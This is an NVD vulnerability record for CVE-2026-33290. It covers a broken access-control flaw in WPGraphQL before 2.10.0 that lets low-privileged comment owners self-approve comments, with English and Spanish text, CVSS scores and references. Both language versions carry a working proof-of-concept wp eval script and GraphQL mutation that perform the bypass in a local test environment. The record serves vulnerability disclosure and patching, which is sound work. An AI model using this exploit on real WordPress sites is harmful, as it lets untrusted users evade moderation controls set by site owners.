{"resultsPerPage":1,"startIndex":0,"totalResults":1,"format":"NVD_CVE","version":"2.0","timestamp":"2026-04-20T03:53:53.029","vulnerabilities":[{"cve":{"id":"CVE-2026-33290","sourceIdentifier":"security-advisories@github.com","published":"2026-03-24T01:17:01.677","lastModified":"2026-04-16T14:46:24.290","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch.\n\n### Details\n\nIn WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based:\n\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 also allows the comment owner, even if they lack moderation capability.\n- plugins/wp-graphql/src/Data/CommentMutation.php:94:94 maps GraphQL input status directly to WordPress comment_approved.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persists that value via wp_update_comment.\n- plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH).\n\nThis means a non-moderator owner can submit status during update and transition moderation state.\n\n### PoC\n\nTested in local wp-env (Docker) with WPGraphQL 2.9.1.\n\n1. Start environment:\n\n  npm install\n  npm run wp-env start\n\n2. Run this PoC:\n\n```\n  npm run wp-env run cli -- wp eval '\n  add_role(\"no_caps\",\"No Caps\",[]);\n  $user_id = username_exists(\"poc_nocaps\");\n  if ( ! $user_id ) {\n    $user_id = wp_create_user(\"poc_nocaps\",\"Passw0rd!\",\"poc_nocaps@example.com\");\n  }\n  $user = get_user_by(\"id\",$user_id);\n  $user->set_role(\"no_caps\");\n\n  $post_id = wp_insert_post([\n    \"post_title\" => \"PoC post\",\n    \"post_status\" => \"publish\",\n    \"post_type\" => \"post\",\n    \"comment_status\" => \"open\",\n  ]);\n\n  $comment_id = wp_insert_comment([\n    \"comment_post_ID\" => $post_id,\n    \"comment_content\" => \"pending comment\",\n    \"user_id\" => $user_id,\n    \"comment_author\" => $user->display_name,\n    \"comment_author_email\" => $user->user_email,\n    \"comment_approved\" => \"0\",\n  ]);\n\n  wp_set_current_user($user_id);\n\n  $result = graphql([\n    \"query\" => \"mutation U(\\$id:ID!){ updateComment(input:{id:\\$id,status:APPROVE}){ success comment{ databaseId status } } }\",\n    \"variables\" => [ \"id\" => (string)$comment_id ],\n  ]);\n\n  echo wp_json_encode([\n    \"role_caps\" => array_keys(array_filter((array)$user->allcaps)),\n    \"status\" => $result[\"data\"][\"updateComment\"][\"comment\"][\"status\"] ?? null,\n    \"db_comment_approved\" => get_comment($comment_id)->comment_approved ?? null,\n    \"comment_id\" => $comment_id\n  ]);\n  '\n```\n\n3. Observe result:\n\n- role_caps is empty (or no moderate_comments)\n- mutation returns status: APPROVE\n- DB value becomes comment_approved = 1\n\n### Impact\n\nThis is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content."},{"lang":"es","value":"WPGraphQL proporciona una API GraphQL para sitios de WordPress. Antes de la versión 2.10.0, una falla de autorización en updateComment permite a un usuario autenticado con bajos privilegios (incluyendo un rol personalizado con cero capacidades) cambiar el estado de moderación de su propio comentario (por ejemplo, a APROBAR) sin la capacidad moderate_comments. Esto puede eludir los flujos de trabajo de moderación y permitir que usuarios no confiables autoaprueben contenido. La versión 2.10.0 contiene un parche.\n\n### Detalles\n\nEn WPGraphQL 2.9.1 (probado), la autorización para updateComment se basa en el propietario, no en el campo:\n\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 permite a los moderadores.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 también permite al propietario del comentario, incluso si carece de la capacidad de moderación.\n- plugins/wp-graphql/src/Data/CommentMutation.php:94:94 mapea el estado de entrada de GraphQL directamente a comment_approved de WordPress.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persiste ese valor a través de wp_update_comment.\n- plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 expone los estados de moderación (APROBAR, EN ESPERA, CORREO NO DESEADO, PAPELERA).\n\nEsto significa que un propietario no moderador puede enviar el estado durante la actualización y hacer la transición del estado de moderación.\n\n### PoC\n\nProbado en wp-env local (Docker) con WPGraphQL 2.9.1.\n\n1. Iniciar entorno:\n\n  npm install\n  npm run wp-env start\n\n2. Ejecutar este PoC:\n\n```\n  npm run wp-env run cli -- wp eval '\n  add_role(\"no_caps\",\"No Caps\",[]);\n  $user_id = username_exists(\"poc_nocaps\");\n  if ( ! $user_id ) {\n    $user_id = wp_create_user(\"poc_nocaps\",\"Passw0rd!\",\"poc_nocaps@example.com\");\n  }\n  $user = get_user_by(\"id\",$user_id);\n  $user->set_role(\"no_caps\");\n\n  $post_id = wp_insert_post([\n    \"post_title\" => \"PoC post\",\n    \"post_status\" => \"publish\",\n    \"post_type\" => \"post\",\n    \"comment_status\" => \"open\",\n  ]);\n\n  $comment_id = wp_insert_comment([\n    \"comment_post_ID\" => $post_id,\n    \"comment_content\" => \"pending comment\",\n    \"user_id\" => $user_id,\n    \"comment_author\" => $user->display_name,\n    \"comment_author_email\" => $user->user_email,\n    \"comment_approved\" => \"0\",\n  ]);\n\n  wp_set_current_user($user_id);\n\n  $result = graphql([\n    \"query\" => \"mutation U(\\$id:ID!){ updateComment(input:{id:\\$id,status:APPROVE}){ success comment{ databaseId status } } }\",\n    \"variables\" => [ \"id\" => (string)$comment_id ],\n  ]);\n\n  echo wp_json_encode([\n    \"role_caps\" => array_keys(array_filter((array)$user->allcaps)),\n    \"status\" => $result[\"data\"][\"updateComment\"][\"comment\"][\"status\"] ?? null,\n    \"db_comment_approved\" => get_comment($comment_id)->comment_approved ?? null,\n    \"comment_id\" => $comment_id\n  ]);\n  '\n```\n\n3. Observar resultado:\n\n- role_caps está vacío (o no tiene moderate_comments)\n- la mutación devuelve status: APROBAR\n- el valor de la base de datos se convierte en comment_approved = 1\n\n### Impacto\n\nEsto es un bypass de autorización / un problema de control de acceso roto en las transiciones de estado de moderación de comentarios. Cualquier despliegue que utilice mutaciones de comentarios de WPGraphQL donde los usuarios con bajos privilegios puedan hacer comentarios está impactado. La política de moderación puede ser eludida autoaprobando contenido."}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/wp-graphql/wp-graphql/releases/tag/wp-graphql%2Fv2.10.0","source":"security-advisories@github.com"},{"url":"https://github.com/wp-graphql/wp-graphql/security/advisories/GHSA-9hc3-mh5h-4fgh","source":"security-advisories@github.com"}]}}]}